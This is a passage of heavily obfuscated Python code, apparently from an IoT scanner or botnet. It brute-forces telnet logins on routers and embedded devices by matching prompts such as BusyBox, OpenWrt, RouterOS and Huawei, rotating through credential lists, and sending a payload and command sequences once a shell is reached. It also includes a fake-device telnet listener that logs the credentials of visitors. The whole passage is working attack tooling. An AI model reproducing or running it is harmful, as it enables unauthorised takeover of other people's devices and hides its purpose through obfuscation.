o00O0OoOoo ] += O0 if 17 - 17: O0oo0OOOOO00 % i1 - IIiIii1iI if iiI1iIi1Ii1Iii [ o00O0OoOoo ] == 0 : if 31 - 31: IIiIii1iI % oOOo0000o if 24 - 24: Oo0Oo . oOoO0Ooo / oOOoO00oo0 if 37 - 37: IIiII * oOOo0000o - O0oo / oOOoO00oo0 / oOoO0Ooo + i1 if ( 'BusyBox v' in O0Oo [ o00O0OoOoo ] and ( '# ' in O0Oo [ o00O0OoOoo ] or '$ ' in O0Oo [ o00O0OoOoo ] ) ) or ( 'Linux ' in O0Oo [ o00O0OoOoo ] and ( '# ' in O0Oo [ o00O0OoOoo ] [ - 2 : ] or '$ ' in O0Oo [ o00O0OoOoo ] [ - 2 : ] ) and not '##' in O0Oo [ o00O0OoOoo ] and not '$$' in O0Oo [ o00O0OoOoo ] ) : IIiIIiIiIi = o0oO0o [ o00O0OoOoo ] iiI1iIi1Ii1Iii [ o00O0OoOoo ] = 5 if 23 - 23: Oooo - OOOoOooO + Oooo + Oo0 O0o0iI [ IIiIIiIiIi ] = 'root/BUSYBOXBLANK' continue if 80 - 80: OOooOO0 - oOOoO00oo0 * O0oo0OOOOO00 / Oooo * Oo0Oo / oOoO0Ooo if OoOoO0o000 [ o00O0OoOoo ] == 0 and 'Please input the verification code:' in O0Oo [ o00O0OoOoo ] : ooOO00oOo = '' try : ooOO00oOo = i1o0o0O00O ( O0Oo [ o00O0OoOoo ] ) except : Ii111i11iIi ( "ERR: BCS crashed" ) pass if 23 - 23: Oooo try : O0O0 . send ( ooOO00oOo + '\n' ) except : pass OoOoO0o000 [ o00O0OoOoo ] = 1 if 'to set your login password' in O0Oo [ o00O0OoOoo ] and 'passwd' in O0Oo [ o00O0OoOoo ] and 'root@' in O0Oo [ o00O0OoOoo ] : IIiIIiIiIi = o0oO0o [ o00O0OoOoo ] iiI1iIi1Ii1Iii [ o00O0OoOoo ] = 5 if 75 - 75: IIiIIiIii1I + Oo0 * o0ooO - OOooOO0 - Oo0Oo O0o0iI [ IIiIIiIiIi ] = 'root/OPENWRTBLANK' continue if 'APPCOM:' in O0Oo [ o00O0OoOoo ] or 'DEBUG avc:' in O0Oo [ o00O0OoOoo ] or 'Polycom Command Shell' in O0Oo [ o00O0OoOoo ] : if 86 - 86: oOOo0000o / IIiIIiIii1I - i1IIi1i1iiI IIiIIiIiIi = o0oO0o [ o00O0OoOoo ] iiI1iIi1Ii1Iii [ o00O0OoOoo ] = 5 O0o0iI [ IIiIIiIiIi ] = '/' if 90 - 90: Oo0Oo % OOooOO0 - i1 continue if 'REINCARNA' in O0Oo [ o00O0OoOoo ] and 'Wifatch' in O0Oo [ o00O0OoOoo ] : if 68 - 68: oOOo0000o + IIiIii1iI if 56 - 56: o0oooooO + Oooo * Oo0Oo - Oo0 IIiIIiIiIi = o0oO0o [ o00O0OoOoo ] ooOO ( O0O0 ) Oo0oooOo00 ( IIiIIiIiIi ) continue if 'Command line is locked now' in O0Oo [ o00O0OoOoo ] : if 60 - 60: Ii11i1iIi + O0oo0OOOOO00 * Ii - OOOoOooO + I11I1Ii / IIiII ooOO ( O0O0 ) continue if 'You have to wait' in O0Oo [ o00O0OoOoo ] : Oo00oO0O = re . search ( 'You have to wait (\d+) min (\d+) sec' , O0Oo [ o00O0OoOoo ] ) if Oo00oO0O : if 53 - 53: Oooo . oOoO0Ooo IIiIIiIiIi = o0oO0o [ o00O0OoOoo ] oooO0ooo0o000 = int ( Oo00oO0O . group ( 1 ) ) IiIiIIi1I1 = int ( Oo00oO0O . group ( 2 ) ) OOOOoO00oOoO [ IIiIIiIiIi ] = Iioo0OooOoO + IiIiIIi1I1 + oooO0ooo0o000 * 60 ; if 57 - 57: oOOo0000o % i1 if 64 - 64: Ii . I11I1Ii * Oo0Oo / O0oo0OOOOO00 % o0oooooO ooOO ( O0O0 ) continue if 29 - 29: oOOo0000o - I11I1Ii / oOOoO00oo0 + i1IIi1i1iiI if ':' in O0Oo [ o00O0OoOoo ] and ( 'Login' in O0Oo [ o00O0OoOoo ] or 'login' in O0Oo [ o00O0OoOoo ] or 'username' in O0Oo [ o00O0OoOoo ] or 'user name' in O0Oo [ o00O0OoOoo ] or 'Username' in O0Oo [ o00O0OoOoo ] or 'USERNAME' in O0Oo [ o00O0OoOoo ] or 'LOGIN' in O0Oo [ o00O0OoOoo ] ) or 'Account:' in O0Oo [ o00O0OoOoo ] : if 87 - 87: Oooo % Ii % OOooOO0 + Oo0 / Oooo iiI1iIi1Ii1Iii [ o00O0OoOoo ] = 1 if 7 - 7: IIiII if ':' in O0Oo [ o00O0OoOoo ] and ( 'assword' in O0Oo [ o00O0OoOoo ] or 'pass word' in O0Oo [ o00O0OoOoo ] ) : if 34 - 34: I11I1Ii + IIiII iiI1iIi1Ii1Iii [ o00O0OoOoo ] = 3 if 72 - 72: Ii11i1iIi if iiI1iIi1Ii1Iii [ o00O0OoOoo ] == 2 : if 91 - 91: IIiIii1iI * i1IIi1i1iiI + Ii / oOOoO00oo0 if ':' in O0Oo [ o00O0OoOoo ] and ( 'assword' in O0Oo [ o00O0OoOoo ] or 'pass word' in O0Oo [ o00O0OoOoo ] ) : if 40 - 40: Ii11i1iIi * I11I1Ii / i1IIi1i1iiI iiI1iIi1Ii1Iii [ o00O0OoOoo ] = 3 if 12 - 12: Oooo if iiI1iIi1Ii1Iii [ o00O0OoOoo ] == 4 : if 19 - 19: Oooo - Ii11i1iIi / o0oooooO . I11I1Ii % IIiII if 9 - 9: IIiIii1iI % i1IIi1i1iiI / O0oo if not 'Last login:' in O0OO0oOoO0O00 [ o00O0OoOoo ] and ( 'incorrect' in O0OO0oOoO0O00 [ o00O0OoOoo ] or 'Incorrect' in O0OO0oOoO0O00 [ o00O0OoOoo ] or ( ':' in O0OO0oOoO0O00 [ o00O0OoOoo ] and ( 'Login' in O0OO0oOoO0O00 [ o00O0OoOoo ] or 'login' in O0OO0oOoO0O00 [ o00O0OoOoo ] or 'username' in O0OO0oOoO0O00 [ o00O0OoOoo ] or 'user name' in O0Oo [ o00O0OoOoo ] or 'Username' in O0OO0oOoO0O00 [ o00O0OoOoo ] or 'USERNAME' in O0OO0oOoO0O00 [ o00O0OoOoo ] or 'LOGIN' in O0OO0oOoO0O00 [ o00O0OoOoo ] ) ) or 'unrecognized user' in O0OO0oOoO0O00 [ o00O0OoOoo ] or "Invalid password" in O0OO0oOoO0O00 [ o00O0OoOoo ] ) : if 18 - 18: IIiIIiIii1I if 18 - 18: o0oooooO * oOoO0Ooo + i1IIi1i1iiI / I11I1Ii if not 'RouterOS' in O0OO0oOoO0O00 [ o00O0OoOoo ] and not 'critical login failure for user' in O0OO0oOoO0O00 [ o00O0OoOoo ] and not 'Completes the command' in O0OO0oOoO0O00 [ o00O0OoOoo ] and not '[admin@' in O0OO0oOoO0O00 [ o00O0OoOoo ] : IIiIIiIiIi = o0oO0o [ o00O0OoOoo ] i11i1iIIii [ IIiIIiIiIi ] += 1 if i11i1iIIii [ IIiIIiIiIi ] >= len ( i1O00o0O [ IIiIIiIiIi ] ) : i11i1iIIii [ IIiIIiIiIi ] = 0 ooOO ( O0O0 ) continue else : oooo00O [ o00O0OoOoo ] = 'R' if 89 - 89: Oo0 + IIiIIiIii1I - Ii if 29 - 29: IIiII IIiIIiIiIi = o0oO0o [ o00O0OoOoo ] if not 'admin/' in i1O00o0O [ IIiIIiIiIi ] and '________admin,' in O0OO0oOoO0O00 [ o00O0OoOoo ] : Oo00oO0O = re . search ( '__________admin,([^_]*)______' , O0OO0oOoO0O00 [ o00O0OoOoo ] ) if Oo00oO0O : i1O00o0O [ IIiIIiIiIi ] = [ 'admin/' + Oo00oO0O . group ( 1 ) ] Ii111i11iIi ( 'NOTC: IP %s:%d -> retry with lc %s' % ( IIIi1iI1111Ii [ IIiIIiIiIi ] [ 0 ] , IIIi1iI1111Ii [ IIiIIiIiIi ] [ 1 ] , i1O00o0O [ IIiIIiIiIi ] [ 0 ] ) ) i11i1iIIii [ IIiIIiIiIi ] = 0 ooOO ( O0O0 ) continue if 52 - 52: Oo0Oo * O0oo0OOOOO00 * o0ooO - i1 % Oo0 / Ii11i1iIi i11iiIiIII1I = O0OO0oOoO0O00 [ o00O0OoOoo ] [ - 40 : ] iII1II1i1I = O0OO0oOoO0O00 [ o00O0OoOoo ] [ - 80 : ] if ( re . search ( '[$%#>] $' , i11iiIiIII1I [ - 2 : ] ) and not 'assword>' in i11iiIiIII1I [ - 10 : ] ) or 'Press enter key' in i11iiIiIII1I or re . search ( '\[\S+@\S*\] > ' , i11iiIiIII1I ) or 'BusyBox v' in O0OO0oOoO0O00 [ o00O0OoOoo ] or '? for help' in O0OO0oOoO0O00 [ o00O0OoOoo ] or ': not found' in i11iiIiIII1I or 'exit system' in i11iiIiIII1I or ( 'User Access Verification' in O0Oo [ o00O0OoOoo ] and re . search ( '[A-Z0-9a-z\-][#>]$' , i11iiIiIII1I [ - 2 : ] ) ) or 'Password expiration warning' in O0OO0oOoO0O00 [ o00O0OoOoo ] or 'for a list of built-in commands' in iII1II1i1I or 'step into administration terminal' in iII1II1i1I or 'Incomplete command found at' in iII1II1i1I or 'welcome to use cli' in O0OO0oOoO0O00 [ o00O0OoOoo ] or ( 'Login authentication' in O0Oo [ o00O0OoOoo ] and re . search ( '[A-Z0-9a-z]\>$' , i11iiIiIII1I [ - 2 : ] ) ) or 'Main menu' in O0OO0oOoO0O00 [ o00O0OoOoo ] or '% Unrecognized command' in i11iiIiIII1I or 'ATP>' in i11iiIiIII1I or re . search ( 'HG\d\S+>$' , i11iiIiIII1I ) or 'Last login: ' in iII1II1i1I : if 21 - 21: OOooOO0 if 25 - 25: OOOoOooO . Oooo % O0oo % oOOoO00oo0 - Ii - IIiIIiIii1I if 32 - 32: oOoO0Ooo % IIiIIiIii1I % oOoO0Ooo / IIiIIiIii1I * i1 O0o0iI [ IIiIIiIiIi ] = i1O00o0O [ IIiIIiIiIi ] [ i11i1iIIii [ IIiIIiIiIi ] ] ; if 5 - 5: OOooOO0 . OOOoOooO if 86 - 86: IIiII - IIiIii1iI + i1 / OOOoOooO . i1 - Ii11i1iIi i1O00o0O [ IIiIIiIiIi ] = [ O0o0iI [ IIiIIiIiIi ] ] i11i1iIIii [ IIiIIiIiIi ] = 0 if 61 - 61: i1IIi1i1iiI % o0ooO / Oooo * oOoO0Ooo / Oo0Oo iiI1iIi1Ii1Iii [ o00O0OoOoo ] = 5 if 72 - 72: IIiIIiIii1I - Ii - O0oo0OOOOO00 if iiI1iIi1Ii1Iii [ o00O0OoOoo ] == 6 : if 7 - 7: oOOoO00oo0 / IIiIIiIii1I % IIiIii1iI - o0oooooO . I11I1Ii * Ii if 83 - 83: OOooOO0 if 16 - 16: o0oooooO / IIiII % o0oooooO % OOOoOooO IIiIIiIiIi = o0oO0o [ o00O0OoOoo ] if 97 - 97: Oo0Oo if 51 - 51: I11I1Ii + O0oo iii = '' I1IiIiIIi = '' if 64 - 64: I11I1Ii * Ii / oOoO0Ooo % Oo0Oo / oOOoO00oo0 % oOOoO00oo0 if not iii : for I11IIIii1i in ooO0o : if 99 - 99: oOoO0Ooo if 12 - 12: oOOoO00oo0 * IIiIIiIii1I * oOOo0000o . O0oo - Ii11i1iIi * i1 if 35 - 35: O0oo . Ii11i1iIi % Oo0 % Oooo if 14 - 14: O0oo . o0ooO . IIiIIiIii1I * IIiII + I11I1Ii . Oo0 if re . search ( I11IIIii1i [ 1 ] , O0o0iI [ IIiIIiIiIi ] ) and re . search ( I11IIIii1i [ 2 ] , O0Oo [ o00O0OoOoo ] ) : if 68 - 68: Oooo if 15 - 15: I11I1Ii - IIiIii1iI % o0ooO * IIiII if 90 - 90: Oooo if 60 - 60: oOOo0000o / IIiII - IIiIii1iI - Oo0Oo . i1IIi1i1iiI if I11IIIii1i [ 0 ] == 'linux' or I11IIIii1i [ 0 ] == 'telnet' or I11IIIii1i [ 0 ] == 'busybox' or I11IIIii1i [ 0 ] == 'freescale' : if O0Oo [ o00O0OoOoo ] . count ( '> ' ) < 6 and O0Oo [ o00O0OoOoo ] . count ( '# ' ) < 6 and O0Oo [ o00O0OoOoo ] . count ( '% ' ) < 6 and O0Oo [ o00O0OoOoo ] . count ( '$ ' ) < 6 and O0Oo [ o00O0OoOoo ] . count ( 'm]#' ) < 6 : continue if 27 - 27: Oooo % Ii if 14 - 14: IIiIIiIii1I iii = I11IIIii1i [ 0 ] I1IiIiIIi = I11IIIii1i [ 3 : ] if 46 - 46: i1 % IIiII if 61 - 61: Oo0 - oOOoO00oo0 / Ii11i1iIi * IIiII if 52 - 52: OOOoOooO * oOOo0000o % IIiIIiIii1I if 43 - 43: O0oo0OOOOO00 % oOOoO00oo0 - oOOoO00oo0 if 76 - 76: I11I1Ii % IIiIii1iI . Ii % oOOoO00oo0 % IIiIii1iI if 76 - 76: oOOo0000o . Oo0Oo % Oooo % OOooOO0 / oOoO0Ooo if 39 - 39: oOOo0000o * O0oo + OOOoOooO * Oo0Oo + Oo0 / Ii if 5 - 5: oOoO0Ooo if 53 - 53: oOOo0000o * Oooo - OOooOO0 / Oooo break if 67 - 67: O0oo % IIiIIiIii1I * IIiII + i1 - Oo0Oo + IIiIii1iI if iii : iiI1iIi1Ii1Iii [ o00O0OoOoo ] = 7 I1IiIii1I1 [ IIiIIiIiIi ] = iii ooOo0 [ o00O0OoOoo ] = I1IiIiIIi if 38 - 38: O0oo0OOOOO00 - O0oo * O0oo % Ii11i1iIi if not ii1iI1I11 ( O0O0 , o00O0OoOoo , IIiIIiIiIi ) : continue if 61 - 61: oOOoO00oo0 . i1 + i1 + Ii if 23 - 23: oOoO0Ooo * Oo0 if 9 - 9: IIiIIiIii1I / Ii + Oooo + O0oo0OOOOO00 * O0oo % O0oo if 47 - 47: O0oo0OOOOO00 % IIiII . Oo0 % Ii if iiI1iIi1Ii1Iii [ o00O0OoOoo ] == 7 : if 18 - 18: OOOoOooO * oOOoO00oo0 * i1IIi1i1iiI * Oo0Oo . i1IIi1i1iiI . Ii11i1iIi if 20 - 20: Oo0 if 30 - 30: oOOo0000o % IIiIii1iI * Oooo if 29 - 29: O0oo . OOooOO0 - oOOo0000o % IIiII % OOooOO0 if re . search ( ooOo0 [ o00O0OoOoo ] [ 1 ] , O0OO0oOoO0O00 [ o00O0OoOoo ] ) : if 19 - 19: o0ooO * OOooOO0 ooOo0 [ o00O0OoOoo ] = ooOo0 [ o00O0OoOoo ] [ 2 : ] IIiIIiIiIi = o0oO0o [ o00O0OoOoo ] if not ii1iI1I11 ( O0O0 , o00O0OoOoo , IIiIIiIiIi ) : continue if 84 - 84: oOOo0000o - O0oo / oOOoO00oo0 * i1 * oOoO0Ooo else : ooOO ( O0O0 ) continue if O0O0 in O0o0 : if 33 - 33: IIiIii1iI * oOOo0000o if 55 - 55: O0oo0OOOOO00 / Oooo if 84 - 84: IIiIii1iI . I11I1Ii + IIiII if iiI1iIi1Ii1Iii [ o00O0OoOoo ] == - 1 : try : O0O0 . send ( "\n" ) except : ooOO ( O0O0 ) continue iiI1iIi1Ii1Iii [ o00O0OoOoo ] = 0 if 60 - 60: IIiII - Ii11i1iIi % o0oooooO . Ii - O0oo0OOOOO00 if iiI1iIi1Ii1Iii [ o00O0OoOoo ] == 1 : if 43 - 43: o0oooooO * Oo0Oo - oOoO0Ooo * O0oo0OOOOO00 % O0oo0OOOOO00 - oOOoO00oo0 IIiIIiIiIi = o0oO0o [ o00O0OoOoo ] ii1OoOo0oOO = '' if 'XXX:' in i1O00o0O [ IIiIIiIiIi ] [ i11i1iIIii [ IIiIIiIiIi ] ] : Oo00oO0O = re . search ( 'XXX:([^:]+):' , i1O00o0O [ IIiIIiIiIi ] [ i11i1iIIii [ IIiIIiIiIi ] ] ) if Oo00oO0O : ii1OoOo0oOO = Oo00oO0O . group ( 1 ) else : ii1OoOo0oOO = i1O00o0O [ IIiIIiIiIi ] [ i11i1iIIii [ IIiIIiIiIi ] ] . split ( '/' ) [ 0 ] try : if 65 - 65: oOOo0000o - o0ooO - IIiIii1iI - I11I1Ii * I11I1Ii - O0oo O0O0 . send ( ii1OoOo0oOO + "\n" ) except : ooOO ( O0O0 ) continue O0OO0oOoO0O00 [ o00O0OoOoo ] = '' iiI1iIi1Ii1Iii [ o00O0OoOoo ] = 2 if iiI1iIi1Ii1Iii [ o00O0OoOoo ] == 3 : if 85 - 85: IIiIii1iI / oOoO0Ooo / oOOo0000o % IIiII IIiIIiIiIi = o0oO0o [ o00O0OoOoo ] O0OoOoo0oOO = '' if 75 - 75: OOOoOooO . Oo0 - Oooo . IIiII if 'XXX:' in i1O00o0O [ IIiIIiIiIi ] [ i11i1iIIii [ IIiIIiIiIi ] ] : Oo00oO0O = re . search ( 'XXX:[^:]+:(\S+)' , i1O00o0O [ IIiIIiIiIi ] [ i11i1iIIii [ IIiIIiIiIi ] ] ) if Oo00oO0O : O0OoOoo0oOO = Oo00oO0O . group ( 1 ) else : O0OoOoo0oOO = i1O00o0O [ IIiIIiIiIi ] [ i11i1iIIii [ IIiIIiIiIi ] ] . split ( '/' ) [ 1 ] try : if 4 - 4: IIiIIiIii1I - Oo0 . O0oo if 84 - 84: IIiIii1iI % Oo0Oo / i1IIi1i1iiI O0O0 . send ( O0OoOoo0oOO + "\n\n" ) except : ooOO ( O0O0 ) continue O0OO0oOoO0O00 [ o00O0OoOoo ] = '' iiI1iIi1Ii1Iii [ o00O0OoOoo ] = 4 if 24 - 24: IIiIIiIii1I % oOOo0000o . IIiII - I11I1Ii . o0ooO if 73 - 73: I11I1Ii if iiI1iIi1Ii1Iii [ o00O0OoOoo ] == 5 : if 95 - 95: Ii11i1iIi * I11I1Ii % O0oo0OOOOO00 + o0oooooO IIiIIiIiIi = o0oO0o [ o00O0OoOoo ] if 69 - 69: O0oo0OOOOO00 if 76 - 76: Oooo % oOoO0Ooo if 38 - 38: IIiIii1iI iii = '' I1IiIiIIi = '' for I11IIIii1i in ooO0o : if 75 - 75: IIiIii1iI - IIiIii1iI + i1 if re . search ( I11IIIii1i [ 1 ] , O0o0iI [ IIiIIiIiIi ] ) and ( I11IIIii1i [ 2 ] == '' or ( I11IIIii1i [ 2 ] == 'PORT:9527:' and IIIi1iI1111Ii [ IIiIIiIiIi ] [ 1 ] == 9527 ) ) : iii = I11IIIii1i [ 0 ] if 81 - 81: OOOoOooO / Ii11i1iIi - O0oo + oOOo0000o + IIiII / oOOo0000o I1IiIiIIi = I11IIIii1i [ 3 : ] break if 82 - 82: i1IIi1i1iiI - Ii11i1iIi if iii : iiI1iIi1Ii1Iii [ o00O0OoOoo ] = 7 I1IiIii1I1 [ IIiIIiIiIi ] = iii ooOo0 [ o00O0OoOoo ] = I1IiIiIIi if 100 - 100: IIiIIiIii1I * o0oooooO . Oooo % i1 % i1IIi1i1iiI / oOOo0000o if 12 - 12: O0oo0OOOOO00 + IIiIii1iI + oOOo0000o if not ii1iI1I11 ( O0O0 , o00O0OoOoo , IIiIIiIiIi ) : continue if 84 - 84: I11I1Ii . O0oo0OOOOO00 * oOoO0Ooo * IIiIii1iI . o0oooooO + Oo0 continue else : if 35 - 35: IIiIii1iI * OOOoOooO - O0oo try : if 91 - 91: O0oo0OOOOO00 % i1IIi1i1iiI O0O0 . send ( oOoOOoooo0 ) except : if 17 - 17: oOoO0Ooo * Ii / I11I1Ii . i1 * Oo0 ooOO ( O0O0 ) continue if 87 - 87: OOOoOooO - i1IIi1i1iiI . Oo0 . O0oo * Ii11i1iIi * IIiIii1iI iiI1iIi1Ii1Iii [ o00O0OoOoo ] = 6 if 63 - 63: o0oooooO / IIiIii1iI % i1IIi1i1iiI * Oo0 . Ii continue if 4 - 4: OOOoOooO * Ii - i1IIi1i1iiI - o0ooO if 89 - 89: Ii11i1iIi / o0oooooO / IIiIIiIii1I % i1 - oOOoO00oo0 if 49 - 49: IIiIii1iI + Oooo - Ii11i1iIi . Oo0 if 42 - 42: I11I1Ii % IIiIIiIii1I - Oooo % o0oooooO if 85 - 85: Oooo * OOOoOooO if 72 - 72: Oo0Oo . Oooo * o0ooO * IIiIii1iI if 65 - 65: Oo0 - O0oo / oOOoO00oo0 . o0oooooO . IIiIii1iI if 14 - 14: IIiIIiIii1I if 95 - 95: i1 + Oooo % IIiII / OOooOO0 if 67 - 67: IIiII + o0oooooO / IIiIii1iI . o0oooooO + i1IIi1i1iiI if iiI1iIi1Ii1Iii [ o00O0OoOoo ] == 7 and Iioo0OooOoO > iIiO00000o [ o00O0OoOoo ] : if len ( ooOo0 [ o00O0OoOoo ] ) <= 2 : if 29 - 29: O0oo . O0oo * i1 + IIiIIiIii1I iIiO00000o [ o00O0OoOoo ] = Iioo0OooOoO + 10 iiI1iIi1Ii1Iii [ o00O0OoOoo ] = 9 try : O0O0 . shutdown ( ) except : pass if 41 - 41: IIiII - O0oo0OOOOO00 + OOOoOooO continue else : ooOo0 [ o00O0OoOoo ] = ooOo0 [ o00O0OoOoo ] [ 2 : ] IIiIIiIiIi = o0oO0o [ o00O0OoOoo ] if not ii1iI1I11 ( O0O0 , o00O0OoOoo , IIiIIiIiIi ) : continue if 34 - 34: O0oo / OOooOO0 - oOoO0Ooo % OOOoOooO . Ii % i1IIi1i1iiI if iiI1iIi1Ii1Iii [ o00O0OoOoo ] == 9 and Iioo0OooOoO > iIiO00000o [ o00O0OoOoo ] : ooOO ( O0O0 ) continue if 58 - 58: IIiII OoO0oOoooo = ooiI1 if iiI1iIi1Ii1Iii [ o00O0OoOoo ] >= 5 : OoO0oOoooo = O0oOOoO if Iioo0OooOoO - Oo000o [ o00O0OoOoo ] > OoO0oOoooo : if 1 - 1: i1 . oOoO0Ooo / oOOoO00oo0 if iiI1iIi1Ii1Iii [ o00O0OoOoo ] == 4 : IIiIIiIiIi = o0oO0o [ o00O0OoOoo ] if 'command' in O0OO0oOoO0O00 [ o00O0OoOoo ] or 'help' in O0OO0oOoO0O00 [ o00O0OoOoo ] : if not 'DEBUG avc' in O0OO0oOoO0O00 [ o00O0OoOoo ] and not 'Polycom' in O0OO0oOoO0O00 [ o00O0OoOoo ] : if not hash ( IIIi1iI1111Ii [ IIiIIiIiIi ] [ 0 ] ) in i11IiiI1 : oOo00o00O = re . sub ( '\r?\n' , ';' , O0Oo [ o00O0OoOoo ] ) oOo00o00O = re . sub ( '[^A-Za-z0-9 \.,:;<>\(\)\[\]\-+%!@/#$=]' , '' , oOo00o00O ) Ii111i11iIi ( 'NOTC: CMDEBUG IP %s:%d %s -> %s' % ( IIIi1iI1111Ii [ IIiIIiIiIi ] [ 0 ] , IIIi1iI1111Ii [ IIiIIiIiIi ] [ 1 ] , i1O00o0O [ IIiIIiIiIi ] [ i11i1iIIii [ IIiIIiIiIi ] ] , oOo00o00O [ : 768 ] ) ) i11IiiI1 [ hash ( IIIi1iI1111Ii [ IIiIIiIiIi ] [ 0 ] ) ] = 1 if 60 - 60: i1IIi1i1iiI ooOO ( O0O0 ) continue if 40 - 40: Ii * O0oo * i1 / oOoO0Ooo if 83 - 83: Ii - OOOoOooO if 93 - 93: o0oooooO % OOOoOooO / oOoO0Ooo / IIiIIiIii1I % O0oo if 50 - 50: o0ooO % Ii11i1iIi if 40 - 40: Ii if 38 - 38: OOooOO0 % i1IIi1i1iiI * o0ooO if 59 - 59: oOOo0000o if 86 - 86: i1IIi1i1iiI / i1 i1111iI = 17 iIIiiIiI = 5 if 74 - 74: oOoO0Ooo o0o0O000O = [ ] oOo0oO000 = { } I1i1111i111i = { } IiiI = { } o0ii1iiIIIIi1i = { } ii1Ii1iIiIIii = { } O0O0o00 = { } if 48 - 48: OOooOO0 / IIiIIiIii1I - O0oo - O0oo if 66 - 66: i1IIi1i1iiI - Oooo + oOOoO00oo0 * IIiIIiIii1I def IiIIi11i1i1I ( input ) : IIII1II1i1 = '' for O0OooO0Oo0O in range ( len ( input ) ) : OOO0OOOoo = input [ O0OooO0Oo0O ] O0oO00OoO0oO = ord ( OOO0OOOoo ) if O0oO00OoO0oO < 32 or O0oO00OoO0oO >= 123 or O0oO00OoO0oO == 96 or O0oO00OoO0oO == 36 or O0oO00OoO0oO == 38 : IIII1II1i1 += '\\x%02x' % ( O0oO00OoO0oO ) else : IIII1II1i1 += OOO0OOOoo return IIII1II1i1 if 29 - 29: Oo0 / oOOo0000o . o0ooO % I11I1Ii + OOooOO0 if 1 - 1: i1 def i1I1iiIII11 ( sock ) : global i1111iI if 8 - 8: O0oo / o0oooooO i1i11II1i = hash ( sock ) try : sock . close ( ) except : pass if 90 - 90: IIiIIiIii1I * oOOoO00oo0 * IIiIIiIii1I + Oo0Oo . oOoO0Ooo if ii1Ii1iIiIIii [ i1i11II1i ] == 0 : if I1i1111i111i [ i1i11II1i ] >= 3 : if 45 - 45: o0oooooO * oOOoO00oo0 - O0oo / I11I1Ii + Oo0Oo oOo00o00O = IiIIi11i1i1I ( IiiI [ i1i11II1i ] ) OoooOO = re . sub ( '\r?\n' , ';' , oOo0oO000 [ i1i11II1i ] [ 2 ] ) OoooOO = re . sub ( '[^A-Za-z0-9]' , '' , OoooOO ) if 77 - 77: Oo0 % oOOo0000o * OOOoOooO - oOOo0000o / i1IIi1i1iiI / o0ooO Ii111i11iIi ( "%s:%d HP:%s:%%:%s" % ( oOo0oO000 [ i1i11II1i ] [ 0 ] , oOo0oO000 [ i1i11II1i ] [ 1 ] , OoooOO [ : 16 ] , oOo00o00O [ : 128 ] ) ) ; if 44 - 44: oOOoO00oo0 . OOOoOooO / o0oooooO / OOOoOooO - Ii11i1iIi o0o0O000O . remove ( sock ) oOo0oO000 [ i1i11II1i ] = None I1i1111i111i [ i1i11II1i ] = None IiiI [ i1i11II1i ] = None o0ii1iiIIIIi1i [ i1i11II1i ] = None ii1Ii1iIiIIii [ i1i11II1i ] = None O0O0o00 [ i1i11II1i ] = None if 42 - 42: Oo0Oo / Oo0Oo * oOOoO00oo0 * Oo0Oo - OOOoOooO if 24 - 24: i1 + o0ooO + Ii11i1iIi - Ii o0OOo0oo = [ '-------------------------------\r\n-----Welcome to ATP Cli------\r\n-------------------------------\r\n\r\nLogin: ' , '\r\n(none) login: ' , 'Ruijie login: ' , '=======================\r\n DSL-500B \r\n=======================\r\nLogin: ' , '\r\nralink login: ' , 'Login as: ' , 'Welcome to Stbs world\r\n\r\nUsername: ' , 'BCM96328 Broadband Router\r\nLogin: ' 'BCM99999 Broadband Router\r\nVosLogin: ' , 'Welcome Visiting Huawei Home Gateway\r\nCopyright by Huawei Technologies Co., Ltd.\r\n\r\nLogin: ' , 'User Access Verification\r\n\r\nUsername: ' , '\r\nWelcome to VeEX(R) V100-IGM/MPX Console.\r\n\r\n(none) login: ' , 'ZyXEL P-870HNU-51B\r\nLogin: ' , 'Account: ' , 'Air5442 login: ' , 'Air5650 login: ' , 'Air5444TT login: ' , 'tc login: ' , 'RT-206v4TT login: ' , 'BCM96318 Broadband Router\r\nLogin: ' , '\r\nIngenic linux machine\r\nKernel 2.6.31.3 on an mips\r\nkopp login: ' , '\r\nBusyBox on (none) login: ' , 'JZ_INGENIC login: ' , ] o0OOOoOOOO0 = random . choice ( o0OOo0oo ) if 58 - 58: OOooOO0 . o0ooO def OOo0OoooO ( connsocket , remote_ip , target_port ) : if 76 - 76: Oo0Oo * O0oo0OOOOO00 + oOOoO00oo0 + IIiIii1iI * O0oo0OOOOO00 - Oo0 global o0OOOoOOOO0 I1I111IiiiI = o0OOOoOOOO0 IIIIiiIIIiiII = 'Password: ' if 61 - 61: Ii11i1iIi / IIiII / oOOo0000o / O0oo0OOOOO00 + Oooo - Oooo if 0 : try : connsocket . close ( ) except : pass return i1i11Ii = ( remote_ip , int ( target_port ) ) i1i11II1i = hash ( connsocket ) o0o0O000O . append ( connsocket ) oOo0oO000 [ i1i11II1i ] = ( remote_ip , int ( target_port ) , I1I111IiiiI , IIIIiiIIIiiII ) I1i1111i111i [ i1i11II1i ] = - 1 IiiI [ i1i11II1i ] = '' o0ii1iiIIIIi1i [ i1i11II1i ] = '' O0O0o00 [ i1i11II1i ] = time . time ( ) ii1Ii1iIiIIii [ i1i11II1i ] = 0 if 85 - 85: IIiIii1iI - i1IIi1i1iiI - oOOoO00oo0 - Ii - Oooo def Oo0Oo0o ( ) : global i1111iI global iIIiiIiI if 36 - 36: o0oooooO - oOoO0Ooo + Ii11i1iIi . o0ooO * oOoO0Ooo % O0oo Iioo0OooOoO = time . time ( ) if 1 - 1: OOooOO0 / OOooOO0 - IIiII if 94 - 94: Oo0 % oOOo0000o O00Oo = 0.01 IIiI1i , O0o0 , IiIIiI11I = select . select ( o0o0O000O , o0o0O000O , [ ] , O00Oo ) for O0O0 in o0o0O000O : i1i11II1i = hash ( O0O0 ) o0oo0OOOo = O0O0 . getsockopt ( socket . SOL_SOCKET , socket . SO_ERROR ) if o0oo0OOOo != 0 : if 94 - 94: Ii11i1iIi * Ii11i1iIi + i1IIi1i1iiI - IIiIIiIii1I / OOOoOooO . O0oo i1I1iiIII11 ( O0O0 ) continue if O0O0 in IIiI1i : O0 = '' try : O0 = O0O0 . recv ( 2048 ) except : pass if 43 - 43: o0oooooO - o0oooooO + O0oo0OOOOO00 - IIiIIiIii1I % oOOo0000o if 40 - 40: o0ooO + oOOo0000o if O0 : o0ii1iiIIIIi1i [ i1i11II1i ] += O0 if 87 - 87: oOOo0000o / OOOoOooO if I1i1111i111i [ i1i11II1i ] == 0 : if 35 - 35: OOOoOooO if 20 - 20: O0oo0OOOOO00 * i1 % oOOo0000o if 22 - 22: Oo0Oo if 90 - 90: O0oo * OOOoOooO % O0oo if 5 - 5: O0oo0OOOOO00 - Ii11i1iIi if 22 - 22: IIiII % o0ooO pass if 58 - 58: IIiII + O0oo0OOOOO00 % 